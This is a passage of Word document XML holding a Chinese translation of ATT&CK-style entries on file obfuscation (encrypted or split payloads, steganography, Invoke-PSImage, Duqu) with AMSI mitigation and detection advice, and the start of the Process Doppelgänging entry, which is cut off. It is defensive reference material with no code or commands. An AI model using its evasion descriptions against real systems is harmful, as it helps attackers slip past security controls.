        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行文件。这种操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>很常见。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以跨不同平台和网络做此操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来规避防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2A8BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效负载可以压缩、存档或加密，从而避免被发现。这些负载可在初始访问期间或之后使用，以减少检测。有时，可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需要用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来打开文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>去模糊化或解密。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还会需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户输入密码来打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用密码保护的压缩</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者也可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用压缩或归档的脚本，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>avascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A03AA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的部分内容编码，隐藏明文字符串，以避免防御程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发现它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。有效负载也可能被分割成单独的、看似善意的文件，这些文件只在重新组装时才</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显现其恶意功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F69990" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者也可能混淆从有效负载或直接通过命令行界面执行的命令。环境变量、别名、字符和其他平台</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言特定语义可以用来规避基于签名的检测和白名单机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E3069" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>混淆的另一个示例是使用隐写术，这是一种将消息或代码隐藏在图像、音轨、视频剪辑或文本文件中的技术。已知</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和报告的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最早应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>隐写术</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的攻击者之一</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Invoke-PSImage</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Duqu</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件对从受害者系统中收集到的信息进行了加密，并将其隐藏到一个图像中，然后将该图像传输到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年底，一个攻击者团体通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Invoke-PSImage</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令隐藏在图像文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中，并在受害者的系统上执行代码。在这种特殊情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码下载了另一个混淆脚本，用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这个脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从受害者的机器中收集情报并将其传达回攻击者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A43F2CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="6092059D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2BC68754" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7A4267B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="08803651" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CEE36F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>恶意软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39BFA741" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上的防恶意软件扫描接口（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AMSI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）来分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>处理和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解释后的命令。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39B082C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43955BAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA6704" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件混淆的检测是困难的，除非混淆后的产物是用签名唯一可检测的。如果无法检测到混淆本身，则有可能检测到导致混淆文件的恶意活动（例如，在文件系统上写入、读取或修改文件）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627EF19F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标记并分析包含混淆指示符和已知可疑语法（例如未解释的转义字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>'''^'''</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>'''"'''</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4688</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示进程的命令行参数。去混淆工具可用于检测文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效负载中的这些指示符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08538D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在网络上检测到有效负载中出于首次访问目的的混淆。使用网络入侵检测系统和电子邮件网关过滤来识别压缩和加密的附件和脚本。某些电子邮件附件轰炸系统可以打开压缩和加密的附件。从</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>某网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加密连接传递的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效负载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加密网络流量检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497A2C8D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>Doppelgänging</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="135B9F18" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0BFF60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> T1186</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A510421" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51184260" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB7354B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51843E9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监测</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5962C1A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件名或文件路径白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名监测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CAB5153" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C412B2">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00C412B2">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CF30933" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B4CD2E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E4152C" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务性</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TxF</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行安全文件操作的方法在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入。</w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为确保数据完整性，</w:t>
      </w:r>
